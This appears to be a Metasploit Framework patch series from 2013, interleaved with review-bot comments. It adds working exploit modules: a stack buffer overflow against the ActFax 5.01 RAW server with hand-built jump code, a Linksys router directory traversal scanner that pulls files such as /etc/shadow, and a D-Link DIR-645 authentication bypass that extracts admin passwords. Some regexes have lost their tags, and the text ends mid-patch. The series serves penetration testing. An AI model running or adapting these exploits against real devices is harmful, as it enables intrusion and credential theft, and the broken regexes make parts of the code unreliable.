From fd63283524e0a5dd6d2f543b7326e6fbe6472a8f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 22 Mar 2013 21:46:12 +0100 Subject: [PATCH 01/21] make msftidy happy --- .../windows/misc/actfax_raw_server_bof.rb | 82 +++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 modules/exploits/windows/misc/actfax_raw_server_bof.rb diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb new file mode 100644 index 0000000000..f389c74eec --- /dev/null +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb 
@@ -0,0 +1,82 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ActFax 5.01 RAW Server Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW + Server can be used to transfer fax messages without any underlying protocols. To + note significant fields in the fax being transferred, like the fax number or the + recipient, ActFax data fields can be used. This module exploits a buffer overflow + in the handling of the @F506 fields due to the insecure usage of strcpy. This + module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English). 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Craig Freyman', # @cd1zz # discovery and Metasploit module + 'corelanc0d3r', # Metasploit module + 'juan vazquez' # Metasploit module cleanup + ], + 'References' => + [ + [ 'OSVDB', '89944' ], + [ 'BID', '57789' ], + [ 'EDB', '24467' ], + [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ] + ], + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => (0x00..0x1f).to_a.pack("C*") + "\x40", + 'DisableNops' => true, + 'Space' => 1024, + 'EncoderOptions' => + { + 'BufferRegister' => 'ECX' + } + }, + 'Targets' => + [ + [ 'ActFax 5.01 / Windows XP SP3', + { + 'Ret' => 0x77c35459, # push esp # ret # msvcrt.dll + 'Offset' => 1024 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Feb 5 2013', + 'DefaultTarget' => 0)) + + end + + def exploit + connect + p = payload.encoded + buffer = p + buffer << rand_text(target['Offset'] - p.length) + buffer << [target.ret].pack("V") + buffer << "\x89\xe1" # mov ecx, esp + buffer << "\x81\xC1\xFC\xFB\xFF\xFF" # add ecx, -1028 + buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500 + buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042 + print_status("Trying target #{target.name}...") + sock.put("@F506 "+buffer+"@\r\npwnag3\r\n\r\n") + disconnect + end +end + From 6eaf995642b3fd1670a10998c7d07fac8555a427 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 22 Mar 2013 21:48:02 +0100 Subject: [PATCH 02/21] cleaning exploiting string --- modules/exploits/windows/misc/actfax_raw_server_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb index f389c74eec..6638f30c7d 100644 --- a/modules/exploits/windows/misc/actfax_raw_server_bof.rb +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb 
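Review bot: In `exploit`, `buffer = p` aliases the String returned by `payload.encoded`, and every following `buffer <<` appends to that same object, so if the framework caches the encoded payload (not visible from this hunk) the cached value is corrupted for any later use in the session. Start from a fresh string instead: `buffer = p.dup` (or `buffer = ''` followed by `buffer << p`). The socket is also opened with `connect` and closed with `disconnect` without an `ensure`, so an exception from `sock.put` leaves the connection to the framework's cleanup rather than closing it here.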
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote buffer << "\x81\xC4\x6C\xEE\xFF\xFF" # add esp, -4500 buffer << "\xE9\xE9\xFB\xFF\xFF" # jmp $-1042 print_status("Trying target #{target.name}...") - sock.put("@F506 "+buffer+"@\r\npwnag3\r\n\r\n") + sock.put("@F506 "+buffer+"@\r\n\r\n") disconnect end end From 89c0e8c27ea9b3421c59da498743e78615874b21 Mon Sep 17 00:00:00 2001 From: Nathan Einwechter Date: Fri, 22 Mar 2013 19:27:02 -0400 Subject: [PATCH 03/21] Fix add_resource call in adobe_flas_mp5_cprt --- modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index 930590bfbb..07022ba8e5 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -176,13 +176,12 @@ class Metasploit3 < Msf::Exploit::Remote # # "/test.mp4" is currently hard-coded in the swf file, so we need to add to resource - # + # proc = Proc.new do |cli, req| + self.add_resource({'Path' => "/test.mp4", 'Proc' => proc}) rescue nil on_request_uri(cli, req) end - self.add_resource({'Path'=>'/test.mp4', 'Proc'=>proc})# rescue nil - end def on_request_uri(cli, request) From 36d1746c0d2b26ff48ed9233f0e0ed361ec64480 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 17:01:02 +0100 Subject: [PATCH 04/21] linksys traversal module - initial commit --- data/wordlists/sensitive_files.txt | 4 +- .../auxiliary/admin/http/linksys_traversal.rb | 132 ++++++++++++++++++ 2 files changed, 135 insertions(+), 1 deletion(-) create mode 100644 modules/auxiliary/admin/http/linksys_traversal.rb diff --git a/data/wordlists/sensitive_files.txt b/data/wordlists/sensitive_files.txt index 5bc6e2a962..79db3e9f44 100755 --- a/data/wordlists/sensitive_files.txt +++ b/data/wordlists/sensitive_files.txt 
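Review bot: The `rescue nil` modifier on the new `self.add_resource(...)` line inside the Proc in adobe_flash_mp4_cprt.rb swallows every StandardError, so a failure to register `/test.mp4` is never surfaced and the request falls through to `on_request_uri` as if nothing happened. Because the line now runs inside the request handler, the resource is also re-registered on every incoming request. If the rescue exists only to tolerate that duplicate registration, a flag set after the first call (`unless @test_mp4_registered`) expresses the intent without hiding other errors. The enclosing method starts and ends outside the hunk.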
@@ -1,4 +1,5 @@
 /etc/passwd
+/etc/shadow
 /etc/groups
 /etc/mysql.conf
 /etc/mysql/my.cnf
@@ -10,4 +11,5 @@
 /etc/motd
 /etc/fstab
 /etc/inetd.conf
-/etc/xinetd.conf
\ No newline at end of file
+/etc/xinetd.conf
+/proc/version
diff --git a/modules/auxiliary/admin/http/linksys_traversal.rb b/modules/auxiliary/admin/http/linksys_traversal.rb
new file mode 100644
index 0000000000..8b896303dd
--- /dev/null
+++ b/modules/auxiliary/admin/http/linksys_traversal.rb
@@ -0,0 +1,132 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Linksys Directory Traversal Vulnerability', + 'Version' => '$$', + 'Description' => %q{ + This module exploits a directory traversal vulnerablity which is present in different + Linksys home routers like the E1500. + }, + 'References' => + [ + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], + [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], + [ 'BID', '57760' ], + [ 'OSVDB', '89911' ], + [ 'EDB', '24475' ], + ], + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + + ], self.class) + end + + def extract_words(wordfile) + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array + end + + def find_files(file,user,pass) + uri = "/apply.cgi" + traversal = '../..' 
+ data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => uri, + 'authorization' => basic_auth(user,pass), + 'encode_params' => false, + 'vars_post' => { + "submit_type" => "wsc_method2", + "change_action" => "gozila_cgi", + "next_page" => traversal << file + } + }) + #puts res.body.length + #puts res + if (res and res.code == 200 and res.body.length > 10) + print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") + report_web_vuln({ + :host => rhost, + :port => rport, + :vhost => datastore['VHOST'], + :path => uri, + :pname => data_trav, + :risk => 3, + :proof => data_trav, + :name => self.fullname, + :category => "web", + :method => "POST" + }) + + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") + elsif (res and res.code) + vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + end + end + + def run_host(ip) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + + #test login + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/) + return if (res.code == 404) + + if [200, 301, 302].include?(res.code) + vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") + else + vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") + return + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + extract_words(datastore['SENSITIVE_FILES']).each do |file| + find_files(file,user,pass) unless file.empty? + end + end +end 
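Review bot: In `find_files`, a file is reported as retrieved and `report_web_vuln` is recorded with `:risk => 3` whenever the POST returns 200 with more than 10 bytes of body, which an error page or login page on this device class would also satisfy; the `print_good` text already hedges with "may have succeeded", so the database write should depend on something stronger, such as a content check on the body for the requested file, or not be recorded as a confirmed vuln at all. The same block builds `"next_page" => traversal << file`, which mutates `traversal` in place where `traversal + file` is meant; harmless here because `traversal` is re-assigned on every call, but it reads as a bug. This file reappears with the same code in patch 07 (`modules/auxiliary/scanner/http/linksys_traversal.rb`), where both points apply.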
From aacd14ae45eca711208b8868a6221be91af94bc7 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 21:31:08 +0100 Subject: [PATCH 05/21] version removed, encode params removed --- modules/auxiliary/admin/http/linksys_traversal.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/http/linksys_traversal.rb b/modules/auxiliary/admin/http/linksys_traversal.rb index 8b896303dd..bffc69d817 100644 --- a/modules/auxiliary/admin/http/linksys_traversal.rb +++ b/modules/auxiliary/admin/http/linksys_traversal.rb @@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Linksys Directory Traversal Vulnerability', - 'Version' => '$$', 'Description' => %q{ This module exploits a directory traversal vulnerablity which is present in different Linksys home routers like the E1500. @@ -64,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'POST', 'uri' => uri, 'authorization' => basic_auth(user,pass), - 'encode_params' => false, + #'encode_params' => false, 'vars_post' => { "submit_type" => "wsc_method2", "change_action" => "gozila_cgi", @@ -73,6 +72,7 @@ class Metasploit3 < Msf::Auxiliary }) #puts res.body.length #puts res + #without res.body.length we get lots of false positives if (res and res.code == 200 and res.body.length > 10) print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") report_web_vuln({ From b1ae2f7bf40eb9eada74009b0788aed2a4906801 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 22:29:31 +0100 Subject: [PATCH 06/21] replace module to the scanner directory --- .../auxiliary/admin/http/linksys_traversal.rb | 132 ------------------ 1 file changed, 132 deletions(-) delete mode 100644 modules/auxiliary/admin/http/linksys_traversal.rb diff --git a/modules/auxiliary/admin/http/linksys_traversal.rb b/modules/auxiliary/admin/http/linksys_traversal.rb deleted file mode 100644 index bffc69d817..0000000000 
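Review bot: Commenting out `'encode_params' => false` in `find_files` leaves dead code in the request hash rather than removing it, and the `#puts res.body.length` / `#puts res` debugging lines above the newly added comment remain as well. Delete the line outright; if the encoding choice matters for the traversal string, say so in the surrounding comment instead of keeping a disabled option around.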
--- a/modules/auxiliary/admin/http/linksys_traversal.rb
+++ /dev/null
@@ -1,132 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner - - def initialize - super( - 'Name' => 'Linksys Directory Traversal Vulnerability', - 'Description' => %q{ - This module exploits a directory traversal vulnerablity which is present in different - Linksys home routers like the E1500. - }, - 'References' => - [ - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], - [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], - [ 'BID', '57760' ], - [ 'OSVDB', '89911' ], - [ 'EDB', '24475' ], - ], - 'Author' => [ 'm-1-k-3' ], - 'License' => MSF_LICENSE - ) - - register_options( - [ - OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", - File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), - OptString.new('USERNAME',[ true, 'User to login with', 'admin']), - OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), - - ], self.class) - end - - def extract_words(wordfile) - return [] unless wordfile && File.readable?(wordfile) - begin - words = File.open(wordfile, "rb") do |f| - f.read - end - rescue - return [] - end - save_array = words.split(/\r?\n/) - return save_array - end - - def find_files(file,user,pass) - uri = "/apply.cgi" - traversal = '../..' 
- data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file - res = send_request_cgi( - { - 'method' => 'POST', - 'uri' => uri, - 'authorization' => basic_auth(user,pass), - #'encode_params' => false, - 'vars_post' => { - "submit_type" => "wsc_method2", - "change_action" => "gozila_cgi", - "next_page" => traversal << file - } - }) - #puts res.body.length - #puts res - #without res.body.length we get lots of false positives - if (res and res.code == 200 and res.body.length > 10) - print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") - report_web_vuln({ - :host => rhost, - :port => rport, - :vhost => datastore['VHOST'], - :path => uri, - :pname => data_trav, - :risk => 3, - :proof => data_trav, - :name => self.fullname, - :category => "web", - :method => "POST" - }) - - loot = store_loot("lfi.data","text/plain",rhost, res.body,file) - vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") - elsif (res and res.code) - vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") - end - end - - def run_host(ip) - user = datastore['USERNAME'] - pass = datastore['PASSWORD'] - - vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") - - #test login - begin - res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) - - return if res.nil? - return if (res.headers['Server'].nil? 
or res.headers['Server'] !~ /httpd/) - return if (res.code == 404) - - if [200, 301, 302].include?(res.code) - vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") - else - vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") - return - end - - rescue ::Rex::ConnectionError - vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") - return - end - - extract_words(datastore['SENSITIVE_FILES']).each do |file| - find_files(file,user,pass) unless file.empty? - end - end -end From bd522a03e36dde3f21a155dbd61606095b562381 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 22:29:44 +0100 Subject: [PATCH 07/21] replace module to the scanner directory --- .../scanner/http/linksys_traversal.rb | 130 ++++++++++++++++++ 1 file changed, 130 insertions(+) create mode 100644 modules/auxiliary/scanner/http/linksys_traversal.rb diff --git a/modules/auxiliary/scanner/http/linksys_traversal.rb b/modules/auxiliary/scanner/http/linksys_traversal.rb new file mode 100644 index 0000000000..c59f1543e1 --- /dev/null +++ b/modules/auxiliary/scanner/http/linksys_traversal.rb 
@@ -0,0 +1,130 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Linksys Directory Traversal Vulnerability', + 'Description' => %q{ + This module exploits a directory traversal vulnerablity which is present in different + Linksys home routers like the E1500. + }, + 'References' => + [ + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ], + [ 'URL', 'http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml' ], + [ 'BID', '57760' ], + [ 'OSVDB', '89911' ], + [ 'EDB', '24475' ], + ], + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + + ], self.class) + end + + def extract_words(wordfile) + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array + end + + def find_files(file,user,pass) + uri = "/apply.cgi" + traversal = '../..' 
+ data_trav = "submit_type=wsc_method2&change_action=gozila_cgi&next_page=" << traversal << file + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => uri, + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + "submit_type" => "wsc_method2", + "change_action" => "gozila_cgi", + "next_page" => traversal << file + } + }) + + #without res.body.length we get lots of false positives + if (res and res.code == 200 and res.body.length > 10) + print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") + report_web_vuln({ + :host => rhost, + :port => rport, + :vhost => datastore['VHOST'], + :path => uri, + :pname => data_trav, + :risk => 3, + :proof => data_trav, + :name => self.fullname, + :category => "web", + :method => "POST" + }) + + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") + elsif (res and res.code) + vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + end + end + + def run_host(ip) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + + #test login + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + return if res.nil? + return if (res.headers['Server'].nil? or res.headers['Server'] !~ /httpd/) + return if (res.code == 404) + + if [200, 301, 302].include?(res.code) + vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") + else + vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") + return + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + extract_words(datastore['SENSITIVE_FILES']).each do |file| + find_files(file,user,pass) unless file.empty? + end + end +end 
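Review bot: In `run_host`, the login probe treats 301 and 302 as `Successful login`, but a redirect is also what an unauthenticated request to a login page typically returns, so the credentials are reported as valid without having been verified; consider accepting only 200, or checking that the redirect target is not the login page. The `return if (res.code == 404)` line just before it is redundant, since any code outside `[200, 301, 302]` already takes the `else` branch and returns. The identical logic is in patch 04's copy of this file (deleted again in patch 06).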
From 47d458a294e6a7a6693ab827f48e8e12e96f9e6c Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 22:40:32 +0100 Subject: [PATCH 08/21] replacement of the netgear-sph200d module --- .../{admin => scanner}/http/netgear_sph200d_traversal.rb | 1 - 1 file changed, 1 deletion(-) rename modules/auxiliary/{admin => scanner}/http/netgear_sph200d_traversal.rb (99%) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb similarity index 99% rename from modules/auxiliary/admin/http/netgear_sph200d_traversal.rb rename to modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 909afe5443..e7131b9306 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -31,7 +31,6 @@ class Metasploit3 < Msf::Auxiliary ) register_options( [ - Opt::RPORT(80), OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), From 7ff9c70e38efdf182371dab47bab1d4db880ed97 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sat, 23 Mar 2013 22:46:26 +0100 Subject: [PATCH 09/21] 10 to 0 is good :) --- modules/auxiliary/scanner/http/linksys_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/linksys_traversal.rb b/modules/auxiliary/scanner/http/linksys_traversal.rb index c59f1543e1..f370dc8a8d 100644 --- a/modules/auxiliary/scanner/http/linksys_traversal.rb +++ b/modules/auxiliary/scanner/http/linksys_traversal.rb 
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary }) #without res.body.length we get lots of false positives - if (res and res.code == 200 and res.body.length > 10) + if (res and res.code == 200 and res.body.length > 0) print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") report_web_vuln({ :host => rhost, From 71708c4bc38376343c34547c313b594509468c0c Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 24 Mar 2013 11:44:24 +0100 Subject: [PATCH 10/21] dir 645 password extractor - initial commit --- .../http/dlink_dir_645_password_extractor.rb | 91 +++++++++++++++++++ 1 file changed, 91 insertions(+) create mode 100644 modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb new file mode 100644 index 0000000000..4ac09a6a15 --- /dev/null +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb 
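Review bot: Lowering the threshold to `res.body.length > 0` makes the condition equivalent to "non-empty body", while the comment on the line above still presents the length check as the defence against false positives, so the comment now overstates what the check does. Either change it to say the check only excludes empty responses, or match on content the requested file would contain. Since this branch feeds `report_web_vuln` and `store_loot`, a looser check means more unverified entries in the database.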
@@ -0,0 +1,91 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'DLink DIR 645 Password Extractor', + 'Description' => %q{ + This module exploits an authentication bypass vulnerability in DIR 645 < v1.03. + With this vulnerability you are able to extract the password for the remote management. + }, + 'References' => + [ + [ 'URL', 'http://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt' ], + [ 'BID', '58231' ], + [ 'OSVDB', '90733' ] + ], + 'Author' => [ + 'Michael Messner ', #metasploit module + 'Roberto Paleari ' #vulnerability discovery + ], + 'License' => MSF_LICENSE + ) + end + + def run_host(ip) + + vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device") + + #Curl request: + #curl -d SERVICES=DEVICE.ACCOUNT http://192.168.178.200/getcfg.php | egrep "\ '/getcfg.php', + 'method' => 'POST', + 'headers' => { + 'Content-Type' => 'application/x-www-form-urlencoded', + 'Content-Length' => '23', + }, + 'vars_post' => { + 'SERVICES' => 'DEVICE.ACCOUNT' + } + }) + + return if res.nil? + return if (res.headers['Server'].nil? 
or res.headers['Server'] !~ /DIR-645 Ver 1.0/) + return if (res.code == 404) + + #proof of response + if res.body =~ /password/ + print_good("#{rhost}:#{rport} - credentials successfully extracted") + vprint_status("#{res.body}") + + #store all details as loot -> there is lots of usefull stuff in the response + loot = store_loot("account_details.txt","text/plain",rhost, res.body) + vprint_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") + + res.body.each_line do |line| + if line =~ // + line = line.gsub(//,'') + pass = line.gsub(/<\/password>/,'') + vprint_good("pass: #{pass}") + end + if line =~ // + line = line.gsub(//,'') + user = line.gsub(/<\/name>/,'') + vprint_good("user: #{user}") + end + end + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + + end +end From 9f8ec37060ef683638e16ea57778da7319d7235f Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 24 Mar 2013 11:48:49 +0100 Subject: [PATCH 11/21] store loot --- .../admin/http/dlink_dir_645_password_extractor.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index 4ac09a6a15..acaf2f1451 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -45,10 +45,10 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/getcfg.php', 'method' => 'POST', - 'headers' => { - 'Content-Type' => 'application/x-www-form-urlencoded', - 'Content-Length' => '23', - }, + #'headers' => { + # 'Content-Type' => 'application/x-www-form-urlencoded', + # 'Content-Length' => '23', + # }, 'vars_post' => { 'SERVICES' => 'DEVICE.ACCOUNT' } 
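Review bot: In `run_host`, the early `return` when the Server header does not match `/DIR-645 Ver 1.0/` (and the 404 case) produces no output, so a non-matching device is indistinguishable from a successful run that found nothing; a `vprint_error("#{rhost}:#{rport} - Server header does not look like a DIR-645 v1.0x device")` before returning would help the operator. The angle-bracket tags in the `line =~ //` regexes and in the curl comment appear to have been stripped in this rendering, as has the `begin` that pairs with the `rescue ::Rex::ConnectionError`, so the parsing logic cannot be checked here.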
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary #store all details as loot -> there is lots of usefull stuff in the response loot = store_loot("account_details.txt","text/plain",rhost, res.body) - vprint_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") + print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") res.body.each_line do |line| if line =~ // From d90de54891a23c24b5233bf07e934d01255bfc06 Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Sun, 24 Mar 2013 15:00:18 +0100 Subject: [PATCH 12/21] reporting and feedback --- .../http/dlink_dir_645_password_extractor.rb | 40 ++++++++++--------- 1 file changed, 22 insertions(+), 18 deletions(-) diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index acaf2f1451..d70ddc1165 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -10,7 +10,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report def initialize super( @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary ) end - def run_host(ip) + def run vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device") @@ -45,10 +45,6 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/getcfg.php', 'method' => 'POST', - #'headers' => { - # 'Content-Type' => 'application/x-www-form-urlencoded', - # 'Content-Length' => '23', - # }, 'vars_post' => { 'SERVICES' => 'DEVICE.ACCOUNT' } 
@@ -58,25 +54,33 @@ class Metasploit3 < Msf::Auxiliary return if (res.headers['Server'].nil? or res.headers['Server'] !~ /DIR-645 Ver 1.0/) return if (res.code == 404) - #proof of response - if res.body =~ /password/ + if res.body =~ /(.*)<\/password>/ print_good("#{rhost}:#{rport} - credentials successfully extracted") - vprint_status("#{res.body}") + #vprint_status("#{res.body}") - #store all details as loot -> there is lots of usefull stuff in the response + #store all details as loot -> there is some usefull stuff in the response loot = store_loot("account_details.txt","text/plain",rhost, res.body) print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}") res.body.each_line do |line| - if line =~ // - line = line.gsub(//,'') - pass = line.gsub(/<\/password>/,'') - vprint_good("pass: #{pass}") + if line =~ /(.*)<\/name>/ + @user = $1 + next end - if line =~ // - line = line.gsub(//,'') - user = line.gsub(/<\/name>/,'') - vprint_good("user: #{user}") + if line =~ /(.*)<\/password>/ + pass = $1 + vprint_good("user: #{@user}") + vprint_good("pass: #{pass}") + + report_auth_info( + :host => rhost, + :port => rport, + :sname => 